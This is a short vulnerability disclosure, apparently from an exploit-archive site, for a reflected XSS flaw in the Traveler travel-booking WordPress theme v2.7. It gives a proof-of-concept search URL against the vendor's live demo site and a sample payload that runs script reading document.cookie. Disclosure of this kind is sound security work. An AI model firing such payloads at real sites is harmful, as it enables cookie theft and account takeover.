Traveler - Travel Booking WordPress Theme v2.7 Reflected XSS Injection

2019.04.28

QUIXSS (RU)

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

[*] :: Title: Traveler - Travel Booking WordPress Theme v2.7 Reflected XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-04-28
[*] :: Software: Traveler - Travel Booking WordPress Theme v2.7
  
[?] :: Technical Details & Description:
# Weak security measures like no input fields data filtering has been discovered in the «Traveler - Travel Booking WordPress Theme». Current version of this WordPress premium theme is 2.7.

[?] :: Demo Website:
# https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
# Frontend: https://remap.travelerwp.com/

[!] :: Special Note:
# 5.822 Sales

[!] :: For developers:
# Disabling any data changes on a demo websites doesn't make your applications more secure. It's good for business and sales but you are simply double-crossing your clients.

[+] :: PoC [Links]:
# https://remap.travelerwp.com/?s=%22%3E%3Cimg%20src=x%20onerror=alert(document.cookie)%3E

[+] :: PoC [Reflected XSS Injection]:
# For Reflected XSS Injection use default WordPress search on the demo website https://remap.travelerwp.com/?s=[payload]
# Sample payload: "><img src=x onerror=alert(document.cookie)>

References:

https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Traveler - Travel Booking WordPress Theme v2.7 Reflected XSS Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.